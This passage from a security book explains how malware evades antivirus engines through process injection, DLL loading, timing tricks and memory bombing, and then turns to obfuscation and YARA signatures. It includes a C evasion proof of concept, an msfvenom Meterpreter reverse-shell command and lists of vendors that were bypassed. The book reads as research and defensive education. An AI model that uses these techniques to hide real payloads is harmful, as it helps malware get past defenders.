functions actually invoke Native APIs to do the work. Antivirus bypass using process injection 67 A great example of this is the Windows API CreateFile() function, which creates a file or receives a handle to an existing file to read its data. The CreateFile() function, as with any other Windows API function, comes in two types: an 'A' type and a 'W' type. When the 'A' type is used in a Windows API function, it expects to receive an American National Standards Institute (ANSI) string argument. When the 'W' type is used in a Windows API function, it expects a wide-character string argument. In fact, most of the Windows API functions will use the 'W' type, but it also depends on how the code author creates its code and which compiler is selected. When a Windows API function such as CreateFile() is called, depending on the parameter provided by the developer, Windows will then transfer execution to one of two Native API routines: ZwCreateFile or NtCreateFile. Windows API execution flow – CreateFile Here is a practical example of the CreateFile execution flow just mentioned. We will use the File -> Open… option in notepad.exe and open a demo file that we have previously created for the sake of this demo. Before we do this, we need to use Process Monitor (ProcMon). In Procmon.exe, we will set up filters, as shown in the following screenshot: Figure 4.9 – ProcMon filtering by example 68 Bypassing the Dynamic Engine As seen here, we can configure the Process Name filter to display the exact and only results of the notepad.exe process. Then, we use the Operation filter to be only the value of CreateFile, which of course, as explained before, creates a file or receives a handle to an existing one. Finally, we use the Path filter followed by the Demo value so that it will only display results regarding filenames with a Demo string in them. Here is a screenshot that shows the results after the opening of the file with notepad.exe: Figure 4.10 – ProcMon CreateFile example As seen here, the CreateFile operation is performed with a Desired Access of Generic Read, as it should be. Let's now go deeper and understand how this operation is executed from a low-level perspective. In the following example, and in the case of Windows's notepad.exe program, the Windows API function used is CreateFileW. We need to put a breakpoint on this function to understand the execution flow. To do this, we will use the x64dbg user-mode debugger. The following screenshot demonstrates how a breakpoint is set on the CreateFileW function and shows that the process hit the breakpoint: Antivirus bypass using process injection 69 Figure 4.11 – x64dbg CreateFileW call example In the command pane of x64dbg, you can see the bp CreateFileW command, and after we hit Enter and the F9 key to continue execution, the process hit the breakpoint. There, we can now see an assembly instruction of jmp CreateFileW, which is part of the kernel32.dll library. 70 Bypassing the Dynamic Engine The following screenshot shows what happens after the jump is executed—execution is transferred from kernel32.dll to the kernelbase.dll library, which contains the actual Windows Native API function, ZwCreateFile: Figure 4.12 – x64dbg ZwCreateFile call example Finally, in the following screenshot, you can see that the execution is transferred from the kernelbase.dll library to the ntdll.dll library before the syscall instruction is executed and transferred to lower layers of the Windows operating system such as the kernel: Figure 4.13 – x64dbg syscall after ZwCreateFile call example Armed with this deeper understanding of the basic concepts and practices underlying how Windows handles process execution, we can now delve into three process-injection techniques. Antivirus bypass using process injection 71 Classic DLL injection We refer to this first technique as classic DLL injection. This technique forces the loading of a malicious DLL into a remote process by using these six basic Windows API functions: • OpenProcess: Using this function and providing the target process ID as one of its parameters, the injector process receives a handle to the remote process. • VirtualAllocEx: Using this function, the injector process allocates a memory buffer that will eventually contain a path of the loaded DLL within the target process. • WriteProcessMemory: This function performs the actual injection, inserting the malicious payload into the target process. • CreateRemoteThread: This function creates a thread within the remote process, and finally executes the LoadLibrary() function that will load our DLL. • LoadLibrary/GetProcAddress: These functions return an address of the DLL loaded into the process. Considering that kernel32.dll is mapped to the same address for all Windows processes, these functions can be used to obtain the address of the API to be loaded in the remote process. Note The x86 and x64 processes have a different memory layout, and loaded DLLs are mapped onto different address spaces. After performing these six functions, the malicious DLL file runs within the operating system inside the address space of the target victim process. 72 Bypassing the Dynamic Engine In the following screenshot, you can see a malware that is using classic DLL injection in IDA Pro view: Figure 4.14 – Classic DLL injection in IDA Pro Now that we understand this basic process-injection technique, let's proceed to the next ones. Process hollowing The second of the three techniques we will discuss here is called process hollowing. This is another common way to run malicious code within the memory address space of another process, but in a slightly different way from classic DLL injection. This injection technique lets us create a legitimate process within the operating system in a SUSPENDED state, hollow out the memory content of the legitimate process, and replace it with malicious content followed by the matched base address of the hollowed section. This way, even knowledgeable Windows users will not realize that a malicious process is running within the operating system. Here are the API function calls used to perform the process-hollowing injection technique: • CreateProcess: This function creates a legitimate operating system process (such as notepad.exe) in a suspended state with a dwCreationFlags parameter. Antivirus bypass using process injection 73 • ZwUnmapViewOfSection/NtUnmapViewOfSection: Those Native API functions perform an unmap for the entire memory space of a specific section of a process. At this stage, the legitimate system process has a hollowed section, allowing the malicious process to write its malicious content into this hollowed section. • VirtualAllocEx: Before writing malicious content, this function allows us to allocate new memory space. • WriteProcessMemory: As we saw before with classic DLL injection, this function actually writes the malicious content into the process memory. • SetThreadContext and ResumeThread: These functions return the context to the thread and return the process to its running state, meaning the process will start to execute. In the following screenshot, you can see a malware that is using process hollowing in IDA Pro view: Figure 4.15 – The first three Windows API calls of process hollowing in IDA Pro 74 Bypassing the Dynamic Engine The preceding screenshot shows the first three Windows API calls. The following screenshot shows the last four of these: Figure 4.16 – The last four Windows API calls of process hollowing in IDA Pro Process hollowing used to be an effective method to bypass antivirus software, but today's antivirus engines will detect it relatively easily. Let's continue with the last process- injection example. Antivirus bypass using process injection 75 Process doppelgänging The third—and last—technique that we will explain in this book is called process doppelgänging. This fascinating process-injection technique is mostly used to bypass antivirus engines and can be used to evade some memory forensics tools and techniques. Process doppelgänging makes use of the following Windows API and Native API functions: • CreateFileTransacted: This function creates or opens a file, file stream, or directory based on Microsoft's NTFS-TxF feature. This is used to open a legitimate process such as notepad.exe. • WriteFile: This function writes data to the destined injected file. • NtCreateSection: This function creates a new section and loads the malicious file into the newly created target process. • RollbackTransaction: This function ultimately prevents the altered executable (such as notepad.exe) from being saved on the disk. • NtCreateProcessEx, RtlCreateProcessParametersEx, VirtualAllocEx, WriteProcessMemory, NtCreateThreadEx, NtResumeThread: All of these functions are used to initiate and run the altered process so that it can perform its intended malicious activity. In the following screenshot, you can see a PE file that is using process doppelgänging in IDA Pro view: Figure 4.17 – The first two Windows API calls of process doppelgänging 76 Bypassing the Dynamic Engine The preceding screenshot shows the first two Windows API calls. The following screenshot shows the last two of these: Figure 4.18 – The last two Windows API calls of process doppelgänging Based on a study presented in 2017 by Tal Liberman and Eugene Kogan, Lost in Transaction: Process Doppelgänging (https://www.blackhat.com/docs/ eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process- Doppelganging.pdf), the following table shows that the process doppelgänging process-injection technique succeeded in evading all of the listed antivirus software: Antivirus bypass using process injection 77 Table 4.1 – Bypassed antivirus software using process doppelgänging Now that we have finished explaining about the three techniques of process injection, let's understand how threat actors use process injection as part of their operations. Process injection used by threat actors Over the years, many threat actors have used a variety of process-injection techniques, such as the following advanced persistent threat (APT) groups: • APT 32 (https://attack.mitre.org/groups/G0050/) • APT 37 (https://attack.mitre.org/groups/G0067/) • APT 41 (https://attack.mitre.org/groups/G0096/) • Cobalt Group (https://attack.mitre.org/groups/G0080/) • Kimsuky (https://attack.mitre.org/groups/G0094/) • PLATINUM (https://attack.mitre.org/groups/G0068/) • BRONZE BUTLER (https://attack.mitre.org/groups/G0060/) 78 Bypassing the Dynamic Engine In the past, many types of malware created by APT groups made use of basic injection techniques, such as those described here, to hide themselves from users and from antivirus software. But since these injection techniques have been signed by antivirus engines, it is no longer practical to use them to perform antivirus software bypass. Today, there are more than 30 process-injection techniques, some of which are better known than others. Security researchers are always trying to find and develop new injection techniques, while antivirus engines try to combat injection mainly using the following two principal methods: 1. Detecting the injection at a static code level—searching for specific combinations of functions within the compiled code even before execution of the file. 2. Detecting the injection at runtime—monitoring processes within the operating system to identify when a particular process is attempting to inject into another process (a detection that will already raise an alert at the initial handle operation on the target victim process). In November 2019, we published a poster containing 17 different injection types, with relevant combinations of functions for each injection type. This was aimed at helping security researchers investigate, hunt for, and classify malware by injection type, as well as to help security researchers and antivirus developers perform more efficient detection of injection types. Here is the first part of that poster: Antivirus bypass using process injection 79 Figure 4.19 – Hunting Process Injection by Windows API Calls: Part 1 80 Bypassing the Dynamic Engine Here is the second part of that poster: Figure 4.20 – Hunting Process Injection by Windows API Calls: Part 2 Now that we know about process injection, we will move on to learning the second bypass technique we used during our research: antivirus bypass using a DLL. Antivirus bypass using a DLL 81 Antivirus bypass using a DLL A DLL is a library file containing number of functions (sometimes hundreds or more) that are, as the name suggests, dynamically loaded and used by Windows PE files. DLL files either include or actually export Windows and Native API functions that are used or imported by PE executables. Those DLLs are used by various programs such as antivirus software programs, easing development by letting coders call a wide range of prewritten functions. To understand better what a DLL file is, as well as any other PE-based file types, it is important to understand the PE file format. PE files PE files play an important role in the Windows operating system. This file format is used by executable binary files with the .exe extension as well as by DLLs with the .dll extension, but those are not only the file types using this versatile file format. Here are a few others: • CPL: Base file for control panel configurations, which plays a basic and important role in the operating system. An example is ncpa.cpl, the configuration file of the network interfaces available on Windows. • SYS: System file for Windows operating system device drivers or hardware configuration, letting Windows communicate with hardware and devices. • DRV: Files used to allow a computer to interact with particular devices. • SCR: Used as a screen saver—used by the Windows operating system. • OCX: Used by Windows for ActiveX control for purposes such as creating forms and web page widgets. • DLL: Unlike with EXE files, DLL files cannot be run on the hard drive by double- clicking on them. Running a DLL file requires a host process that imports and executes its functions. There are a few different ways to accomplish this. As with many other file formats (Executable Linkable Format (ELF) and Mach Object (Mach-O) files, to name but a few), the PE file format structure has two main parts: the PE headers, which will include relevant and important technical information about PE-based files, and the PE sections, which will include the PE file content. Each one of the sections will serve a different goal in PE files. 82 Bypassing the Dynamic Engine PE file format structure The following diagram demonstrates the structure of a mmmArsen.exe file: Figure 4.21 – The PE structure Let's look at PE headers. PE headers Here is an explanation of each one of the PE headers: • Disk Operating System (DOS) header—An identifier or magic value to identify PE files. • DOS stub—An old message that still remains in most PE files. It will likely say This program cannot be run in DOS mode and will sometimes be manipulated in order to bypass antivirus software. • PE header—This header basically declares that a file is in the PE file format. • Optional header—This will include variable information such as the size of the code, the entry point of the executable/library file, the image base, section alignment, and more. • Sections table—This is a reference table for each one of the PE sections. Antivirus bypass using a DLL 83 PE sections Here is an explanation of each one of the PE sections: • Code section—This section will include the machine code of the program (compiled code) that the central processing unit (CPU) will eventually execute. • Imports section—This section will include needed functions, which are imported from DLLs such as Kernel32.dll and Ntdll.dll. • Data section—This section will include the variables and function parameters that will be used by the program. The execution The first option is to use rundll32.exe, which allows the execution of a function contained within a DLL file using the command line. For example, to run the entry point with a single argument, we can use the following syntax: RUNDLL32.EXE <dllname>,<entrypoint> <argument> As an example, the following screenshot demonstrates a DLL running under rundll32. exe with an non existent function name: Figure 4.22 – Hello World DLL running using rundll32.exe 84 Bypassing the Dynamic Engine A second way to execute DLL files is by loading the file into an EXE file using the LoadLibrary()/LoadLibraryEx() functions. When an EXE file uses the LoadLibrary() function, it passes the name of the module as a parameter, as follows: Figure 4.23 – LoadLibraryA() Windows API function from Microsoft Developer Network (MSDN) Only once this is done can the DLL file be run within the EXE file that called it. Many hackers take advantage of this mechanism for the following reasons: • DLL files are usually hidden from the ordinary user. • When a DLL loads inside another process, that DLL has access to the process memory space of the process loading the DLL. • It is much more difficult to perform automatic dynamic analysis on a DLL than on an EXE file. • When a DLL is loaded to a process it is more difficult to find the DLL inside the system processes, and thus this makes life harder for antivirus detection and for incident response. Now that we know about how it is possible to bypass antivirus software with a DLL, we will move on to learning the third bypass technique we used during our research: antivirus bypass using timing-based techniques. Antivirus bypass using timing-based techniques 85 Antivirus bypass using timing-based techniques In order to sell security products, antivirus vendors have to emphasize two central characteristics, as follows: • High level of detection—Protecting the user from threats • User-friendly—Comfortable user interface (UI), clear images, fast scans, and more For example, we can look at a particular endpoint that has about 100,000 files. If we were to demand maximum detection from antivirus software, scanning all of those 100,000 files could take a few days—and, in a few cases, even longer. This is an extreme demand that antivirus vendors cannot possibly meet, and are not supposed to. In order to avoid this kind of situation, antivirus vendors do everything possible to maximize wait time during a scan, even if this means that at best, detection is less precise, or at worst, that malware is not detected at all. Antivirus vendors prefer to scan about 100,000 files in 24 minutes, with a detection rate of about 70%, over scanning the same number of files in 24 hours, with a detection rate of around 95%, and it is precisely this preference that attackers and researchers can take advantage of to avoid detection and, in fact, to conduct antivirus bypass. There are a few techniques we can use as part of timing-based bypass. In this book, we will explain two main techniques. The first technique will utilize Windows API calls that cause the malware not to reach its malicious functionality within a short time. The second technique causes the malware to take a long time loading, thus causing the antivirus software to give up on continuing the malware scan and to conclude that it is an innocent file. Windows API calls for antivirus bypass The two Windows API calls we will address in this chapter are Sleep() (https:// docs.microsoft.com/en-us/windows/win32/api/synchapi/ nf-synchapi-sleep) and GetTickCount() (https://docs.microsoft. com/en-us/windows/win32/api/sysinfoapi/nf-sysinfoapi- gettickcount). 86 Bypassing the Dynamic Engine In the past, malware authors used the Sleep() function to cause the malware to delay executing its malicious functionality for a few seconds, minutes, hours, or even days. That way, it could avoid detection by conducting anti-analysis, to harden the life for antivirus software and malware analysts. But today, when—for example—a static engine of an antivirus software detects the Sleep() function in a file, the engine causes its emulator to enter the function and run the file for the length of time assigned by its function. For example, if the static engine detects the Sleep() function with a 48-hour delay, the antivirus emulator will perform emulation on the file, making it think that 48 hours have passed, thus bypassing its "defense" mechanism. That is the main reason that the Sleep() function is not really applicable today for antivirus bypass. So, in order to use the timing-based bypass technique, we have to use other functions—functions such as GetTickCount(). The GetTickCount() function is not passing any parameters but returns the amount of time the operating system has been up and running, in milliseconds (ms). The maximum amount of time the function can return is 49.7 days. Using this function, a malware identifies how long the operating system has been running and decides when the best time is to run its malicious functions and—of course—whether it is advisable to execute them at all. The following screenshot illustrates the Sleep() function within a PE file: Antivirus bypass using timing-based techniques 87 Figure 4.24 – Sleep() function in a PE file 88 Bypassing the Dynamic Engine The following screenshot shows an al-khaser.exe file (https://github.com/ LordNoteworthy/al-khaser) that uses the Sleep() and GetTickCount() functions to identify whether time has been accelerated: Figure 4.25 – GetTickCount() function in a PE file The following screenshot shows the number of keylogger detections after using the GetTickCount() function: Figure 4.26 – Malicious file that is detected by 3/70 antivirus vendors Here is a list of antivirus vendors that did not detect the keylogger file: • Avast • AVG • Avira (No Cloud) Antivirus bypass using timing-based techniques 89 • CrowdStrike Falcon • Cybereason • Cynet • Fortinet • F-Secure • G-Data • Malwarebytes • McAfee • Microsoft • Palo Alto Networks • Panda • Sophos • Symantec • Trend Micro During the research, for Proof-of-Concept (PoC) purposes, we used the Sleep() and GetTickCount() functions exclusively, but there are many other functions that can help malware to conduct timing- based antivirus bypass (http://www.windowstimestamp.com/ MicrosecondResolutionTimeServicesForWindows.pdf). These include the following: • GetSystemTime • GetSystemTimeAsFileTime • QueryPerformanceCounter • Rdtsc • timeGetTime • And more… Let's learn about memory bombing. 90 Bypassing the Dynamic Engine Memory bombing – large memory allocation Another way to take advantage of the limited time that antivirus software has to dedicate to each individual file during scanning is to perform a large memory allocation within the malware code. This causes the antivirus software to use excessive resources to check whether the file is malicious or benign. When antivirus uses excessive resources to perform a simple scan on a relatively large amount of memory, it forces the antivirus to back off from detecting our malicious file. We call this technique memory bombing. Before we dive into a practical example of how to bypass the antivirus using this technique, we need to first understand the memory allocation mechanism, including what is actually happening in the memory while using the malloc() function, and the difference between malloc() and calloc(). We will also look at a practical Proof-of- Concept that demonstrates the effectiveness of this technique. What is malloc()? malloc() is a function of the C language that is used, to some extent, in most mainstream operating systems such as Linux, macOS, and—of course—Windows. When writing a C/C++ based program, we can declare the malloc() function to be a pointer, as follows: void *malloc(size);. After execution of this function, it returns a value with a pointer to the allocated memory of the process's heap (or NULL if execution fails). It is important to note that is the programmer's responsibility to free the allocated memory from the process's heap using the free() function, as follows: free(*ptr);. The *ptr parameter of the free() function is the pointer to the previously allocated memory that was allocated with malloc(). From an attacker's standpoint, freeing the allocated memory space is crucial, mainly to wipe any data that could be used as an evidence for blue teams, digital forensics experts, and malware analysts. Antivirus bypass using timing-based techniques 91 The following diagram illustrates how the malloc() function allocates a block of memory within a process's heap memory: Figure 4.27 – Memory allocation using malloc() Let's now understand the differences between—and uses of—malloc() and calloc(). calloc() versus malloc() calloc() is another function that can be used to allocate memory in a process's heap. Unlike malloc(), which requests an allocation of memory but does not fill that memory with any data and leaves it uninitialized, calloc() initializes and fills all of the requested allocated memory with zero bits. With this basic understanding of memory allocation, let's dive into the following practical example. Here is a Proof-of-Concept example, written in C, of the memory-bombing technique: int main() {     char *memory_bombing = NULL;     memory_bombing = (char *) calloc(200000000, sizeof(char));     if(memory_bombing != NULL)     { 92 Bypassing the Dynamic Engine         free(memory_bombing);         payload();     }     return 0; } This code defines a main() function, which will ultimately execute the calloc() function with two parameters (the number of elements, and the overall size of the elements). Then, the if statement validates that the returned value is a valid pointer. At this point, after executing the calloc() function, the antivirus forfeits, and thus our code bypasses the antivirus. Next, we free the allocated memory by calling the free() function with a pointer to the allocated memory as a parameter, and finally run our malicious shellcode. The following summary shows the flow of actions taking place within this code: 1. Define a main() function. 2. Declare a pointer variable named memory_bombing of type char with a NULL value. 3. Initialize the memory_bombing variable with the pointer of the returned value of the allocated memory of calloc(). At this point, the antivirus is struggling to scan the file, and forfeits. 4. For the sake of clean and elegant coding, check if the returned value of memory_ bombing is a valid pointer to our allocated memory. 5. Finally, free the allocated memory using the free() function and execute the intended malicious shellcode by calling our custom payload() function. Now let's understand the logic behind this bypass technique. The logic behind the technique The logic behind this type of bypass technique relies on the dynamic antivirus engine scanning for malicious code in newly spawned processes by allocating virtual memory so that the executed process can be scanned for malicious code in a sandboxed environment. The allocated memory is limited because antivirus engines do not want to impact the user experience (UX). That is why, if we allocate a large amount of memory, antivirus engines will opt to retreat from the scan, thus paving the way for us to execute our malicious payload. Antivirus bypass using timing-based techniques 93 Now, we can take this bypass technique and embed it in a simple C program that connects to a Meterpreter listener on a specific port. We used a simple Meterpreter shellcode, generated using the following command: msfvenom -p windows/x64/Meterpreter/reverse_ tcp LHOST= LPORT=443 -f c After embedding the code, we compiled it to a PE EXE file. The following screenshot demonstrates the results of a VirusTotal scan before implementing the memory-bombing bypass technique: Figure 4.28 – 27/69 antivirus vendor detections before implementing memory-bombing technique 94 Bypassing the Dynamic Engine And the following screenshot demonstrates the VirusTotal results after implementing the memory-bombing bypass technique: Figure 4.29 – 17/68 antivirus vendor detections after implementing the memory-bombing technique Important note We specifically used a Meterpreter-based reverse shell to demonstrate how dangerous it is, and the fact that many antivirus engines do not detect it shows the power of this bypass technique. Notice that this technique overcame more than 30 antivirus engines. Here is a list of major antivirus software that could be successfully bypassed solely by using this technique: • Avast • Bitdefender • Comodo Summary 95 • Check Point ZoneAlarm • Cybereason • Cyren • Fortinet • Kaspersky • Malwarebytes • McAfee • Palo Alto Networks • Panda • Qihoo 360 • SentinelOne (Static ML) • Sophos • Symantec • Trend Micro Let's summarize the chapter. Summary In this chapter of the book, we started with preparing ourselves for antivirus bypass research, and you gleaned our main perspective about antivirus bypass—the use of platforms such as VirusTotal and other alternatives. Furthermore, you have learned about Windows API functions and their use in the Windows operating system, as well as about process address spaces and three different process-injection techniques. Next, we introduced you to some accompanying knowledge, such as the common PE file types, the PE file structure, how to execute a DLL file, and why attackers use DLL files as an integral part of their attacks. Also, we learned about timing-based attacks, using the Sleep() and GetTickCount() functions respectively to evade antivirus detections, and looked at why the Sleep() function is irrelevant in modern antivirus bypass techniques. 96 Bypassing the Dynamic Engine Other than that, you learned about memory allocations and the differences between the malloc() and calloc() system call functions. In the next chapter, you will learn how it is possible to bypass antivirus static engines. Further reading • You can read more about keyloggers in our article, Dissecting Ardamax Keylogger: https://malwareanalysis.co/dissecting-ardamax-keylogger/ 5 Bypassing the Static Engine In this chapter, we will go into bypassing antivirus static detection engines in practical terms. We will learn the use of various obfuscation techniques that can be used to potentially bypass static antivirus engines. Furthermore, we will go through understanding the use of different encryption techniques such as oligomorphic-, polymorphic-, and metamorphic-based code that can be used to potentially bypass static antivirus engines. We will also show how packing and obfuscation techniques are used in malicious code to bypass most static engines in antivirus software. In this chapter, we will explore the following topics: • Antivirus bypass using obfuscation • Antivirus bypass using encryption • Antivirus bypass using packing 98 Bypassing the Static Engine Technical requirements To follow along with the topics in the chapter, you will need the following: • Previous experience in antivirus software • Basic understanding of detecting malicious Portable Executable (PE) files • Basic understanding of the C/C++ or Python programming languages • Basic knowledge of the x86 assembly language • Nice to have: Experience using a debugger and disassemblers such as Interactive Disassembler Pro (IDA Pro) and x64dbg Check out the following video to see the code in action: https://bit.ly/3iIDg7U Antivirus bypass using obfuscation Obfuscation is a simple technique of changing a form of code—such as source code and byte code—to make it less readable. For example, an Android Package Kit (APK) file can easily be decompiled to make it readable to Java code. Here is an example of a decompilation process: Figure 5.1 – Basic decompilation process An app developer does not want unauthorized individuals to see their code, so the developer will use an obfuscation technique to protect the code and make it unreadable. There are several obfuscation techniques. These are the two main techniques we have used in our research: • Rename obfuscation • Control-flow obfuscation Let's look at both of these techniques in detail. Antivirus bypass using obfuscation 99 Rename obfuscation With this technique, obfuscation is mainly performed on the variable names within the code. This technique makes it difficult to read and understand the code, as well as to understand the variable names and their context within the code itself. After obfuscation, the variable name may be letters such as "A", "B", "C", and "D", numbers, unprintable characters, and more. For example, we can use Oxyry Python Obfuscator (https://pyob.oxyry.com/) to perform rename obfuscation on this code to solve the eight queens problem. Here is the readable code: """The n queens puzzle. https://github.com/sol-prog/N-Queens-Puzzle/blob/master/ nqueens.py """ __all__ = [] class NQueens: """Generate all valid solutions for the n queens puzzle""" def __init__(self, size): # Store the puzzle (problem) size and the number of valid solutions self.__size = size self.__solutions = 0 self.__solve() def __solve(self): """Solve the n queens puzzle and print the number of solutions""" positions = [-1] * self.__size self.__put_queen(positions, 0) print("Found", self.__solutions, "solutions.") def __put_queen(self, positions, target_row): """ 100 Bypassing the Static Engine Try to place a queen on target_row by checking all N possible cases. If a valid place is found the function calls itself trying to place a queen on the next row until all N queens are placed on the NxN board. """ # Base (stop) case - all N rows are occupied if target_row == self.__size: self.__show_full_board(positions) self.__solutions += 1 else: # For all N columns positions try to place a queen for column in range(self.__size): # Reject all invalid positions if self.__check_place(positions, target_row, column): positions[target_row] = column self.__put_queen(positions, target_row + 1) def __check_place(self, positions, ocuppied_rows, column): """ Check if a given position is under attack from any of the previously placed queens (check column and diagonal positions) """ for i in range(ocuppied_rows): if positions[i] == column or \ positions[i] - i == column - ocuppied_rows or \ positions[i] + i == column + ocuppied_rows: return False return True def __show_full_board(self, positions): """Show the full NxN board""" for row in range(self.__size): Antivirus bypass using obfuscation 101 line = "" for column in range(self.__size): if positions[row] == column: line += "Q " else: line += ". " print(line) print("\n") def __show_short_board(self, positions): """ Show the queens positions on the board in compressed form, each number represent the occupied column position in the corresponding row. """ line = "" for i in range(self.__size): line += str(positions[i]) + " " print(line) def main(): """Initialize and solve the n queens puzzle""" NQueens(8) if __name__ == "__main__": # execute only if run as a script main() And here is the same code, which has exactly the same functionality, after performing rename obfuscation using Oxyry: ""#line:4 __all__ =[]#line:6 class OO00OOOO0O0O00000 :#line:8 ""#line:9 def __init__ (O0OOO0000O0OO0000 ,O00OO0O00OO0OO0O0 ):#line:11 102 Bypassing the Static Engine O0OOO0000O0OO0000 .__OOOO0000O00OO00OO =O00OO0O00OO0OO0O0 #line:13 O0OOO0000O0OO0000 .__OOOO0O00000O0O0O0 =0 #line:14 O0OOO0000O0OO0000 .__O00OO0000O0000000 ()#line:15 def __O00OO0000O0000000 (O0000OO0OO00000O0 ):#line:17 ""#line:18 O0000OOO0OOOO0000 =[-1 ]*O0000OO0OO00000O0 .__ OOOO0000O00OO00OO #line:19 O0000OO0OO00000O0 .__O00O00O00000O0OOO (O0000OOO0OOOO0000 ,0 )#line:20 print ("Found",O0000OO0OO00000O0 .__OOOO0O00000O0O0O0 ,"solutions.")#line:21 def __O00O00O00000O0OOO (OOOOOOOOOO0O0O0OO ,OOOOO0OOOO0000000 ,O00O0OOO0O0000O00 ):#line:23 ""#line:28 if O00O0OOO0O0000O00 ==OOOOOOOOOO0O0O0OO .__ OOOO0000O00OO00OO :#line:30 OOOOOOOOOO0O0O0OO .__O0OOOOOOO0O000O0O (OOOOO0OOOO0000000 )#line:31 OOOOOOOOOO0O0O0OO .__OOOO0O00000O0O0O0 +=1 #line:32 else :#line:33 for O00OO0OO000OO0OOO in range (OOOOOOOOOO0O0O0OO .__OOOO0000O00OO00OO ):#line:35 if OOOOOOOOOO0O0O0OO .__OOO000OO0000OOOOO (OOOOO0OOOO0000000 ,O00O0OOO0O0000O00 ,O00OO0OO000OO0OOO ):#line:37 OOOOO0OOOO0000000 [O00O0OOO0O0000O00 ]=O00OO0OO000OO0OOO #line:38 OOOOOOOOOO0O0O0OO .__O00O00O00000O0OOO (OOOOO0OOOO0000000 ,O00O0OOO0O0000O00 +1 )#line:39 def __OOO000OO0000OOOOO (OOOO00OOOOOO00O0O ,O0OOOOO00OO000OO0 ,OOOOO0OOO0O00O0O0 ,OO0O0OO000OOOOO00 ):#line:42 ""#line:46 for O0OOO00OOOO0OOOOO in range (OOOOO0OOO0O00O0O0 ):#line:47 if O0OOOOO00OO000OO0 [O0OOO00OOOO0OOOOO ]==OO0O0OO000OOOOO00 or O0OOOOO00OO000OO0 [O0OOO00OOOO0OOOOO ]-O0OOO00OOOO0OOOOO ==OO0O0OO000OOOOO00 -OOOOO0OOO0O00O0O0 Antivirus bypass using obfuscation 103 or O0OOOOO00OO000OO0 [O0OOO00OOOO0OOOOO ]+O0OOO00OOOO0OOOOO ==OO0O0OO000OOOOO00 +OOOOO0OOO0O00O0O0 :#line:50 return False #line:52 return True #line:53 def __O0OOOOOOO0O000O0O (O0O0000O0OOO0OO0O ,OOO000OOOO0O00OO0 ):#line:55 ""#line:56 for O0OO0OOO000OOO0OO in range (O0O0000O0OOO0OO0O .__ OOOO0000O00OO00OO ):#line:57 OO0000OOOO000OO0O =""#line:58 for OO0O00O0O000O00O0 in range (O0O0000O0OOO0OO0O .__OOOO0000O00OO00OO ):#line:59 if OOO000OOOO0O00OO0 [O0OO0OOO000OOO0OO ]==OO0O00O0O000O00O0 :#line:60 OO0000OOOO000OO0O +="Q "#line:61 else :#line:62 OO0000OOOO000OO0O +=". "#line:63 print (OO0000OOOO000OO0O )#line:64 print ("\n")#line:65 def __OOOOOOO00O0O000OO (O00O000OOOO00OO0O ,O000O00000OO0O0O0 ):#line:67 ""#line:71 OO000O00OO0O00OO0 =""#line:72 for O00OOOO0O0O0O00OO in range (O00O000OOOO00OO0O .__ OOOO0000O00OO00OO ):#line:73 OO000O00OO0O00OO0 +=str (O000O00000OO0O0O0 [O00OOOO0O0O0O00OO ])+" "#line:74 print (OO000O00OO0O00OO0 )#line:75 def O00O0O0O00OO00OO0 ():#line:77 ""#line:78 OO00OOOO0O0O00000 (8 )#line:79 if __name__ =="__main__":#line:81 O00O0O0O00OO00OO0 ()#line:83 We highly recommend that before you write your own code and obfuscate it, take the preceding example and learn the differences between the regular and the obfuscated code to better understand the mechanisms behind it. Feel free to go to the aforementioned website, where this code is provided. 104 Bypassing the Static Engine Now that we have understood the concept behind rename obfuscation, let's now understand the concept behind control-flow obfuscation. Control-flow obfuscation Control-flow obfuscation converts original source code to complicated, unreadable, and unclear code. In other words, control-flow obfuscation turns simple code into spaghetti code! For example, here's a comparison between code before control-flow obfuscation and the same code after performing control-flow obfuscation (https:// reverseengineering.stackexchange.com/questions/2221/what-is-a- control-flow-flattening-obfuscation-technique): Figure 5.2 – Code before and after control-flow obfuscation Antivirus bypass using obfuscation 105 When using one of these obfuscation techniques to bypass antivirus software, the engine it is bypassing will be the static engine. To understand specifically why the static engine is the one that is bypassed, we need to examine some static signatures. Because this explanation will center on YARA-based signatures, it can be helpful to understand a little bit about YARA first to gain a better understanding of static signatures. Introduction to YARA YARA is an open source cross-platform tool primarily intended to help malware researchers to identify and classify malware samples. It offers a rule-based methodology for creating malware-type descriptions based on textual and binary patterns. Today, it is widely used by security researchers, malware analysts, forensics investigators, incident responders, and—of course—by antivirus vendors as part of their detection engines. From a preliminary glimpse at YARA, you might think it is a simple tool, yet we see YARA as one of those things that are genius in their simplicity. This tool is a pattern-matching "Swiss army knife" that detects patterns in files and in plain-text memory dumps, using prewritten signatures created mostly by security researchers and malware analysts. Let's go a little further to gain a better understanding of how YARA pulls this off. How YARA detects potential malware YARA is a rule-based pattern-matching tool that, if we write it correctly, can detect potential malware and even hunt it on a wider scale. Antivirus software often incorporates YARA in its static engines, especially for file-based detections. For example, if malware such as the WannaCry ransomware is scanned for malicious and well-known patterns by prewritten YARA rules, it can be potentially detected, and the antivirus will prevent it from running on the targeted system. YARA – the building blocks YARA rules start with the word rule, followed by the rule name. Generally, rule names are descriptive and are based on the malware type and other parameters. Next, the body of the rules is preceded and followed with curly brackets (braces), as can be seen in the rule that follows. The bracketed section of YARA rules includes two important subsections: strings and condition. 106 Bypassing the Static Engine The strings section will contain the patterns, strings, hexadecimal (hex) values, and operation code (opcode) that we want to detect in malicious files. The condition section is a logical section that defines the conditions under which the rule will detect or match a pattern in a file and deliver a true result. The meta section, which appears above the other sections, is optional, and is used to describe written rules and explain their purpose. The following pseudo example will help give you an understanding of each of these sections: rule ExampleRule_02202020 {     meta:         description = "Ransomware hunter"     strings:         $a1 = {6A 40 68 00 30 00 00 6A 14 7D 92}         $a2 = "ransomware" nocase         $c = "Pay us a good amount of ransom"      condition:         1 of $a* and $c } This example includes the following elements that make it a basic and correct YARA rule: 1. The name of the rule is defined using the word rule. 2. We have used the meta section to describe the goal of this rule. 3. The strings section defines three variables, each of which provides a potential pattern to match and detect in potential malicious files. (Notice that we have used the nocase keyword in the $a2 variable so that YARA will match the string pattern as case-insensitive.) 4. The condition section defines the conditions that must be met in order to consider a file malicious. Antivirus bypass using obfuscation 107 Important note In order to write a good YARA signature, it is very important to check a number of variants of the malware that you are trying to hunt and detect. It is also crucial to test and ensure that the YARA rule does not give any false positives (for example, false detections). Now that we understand the basics of YARA, we can turn to exploring how it is used in the wild. YARA signature example – Locky ransomware In this example, we will see how a YARA signature can detect the Locky ransomware. The following code snippet shows a YARA signature that we wrote to detect Locky's executable (EXE) file: rule Locky_02122020 {     meta:         description = "Locky ransomware signature"     strings:         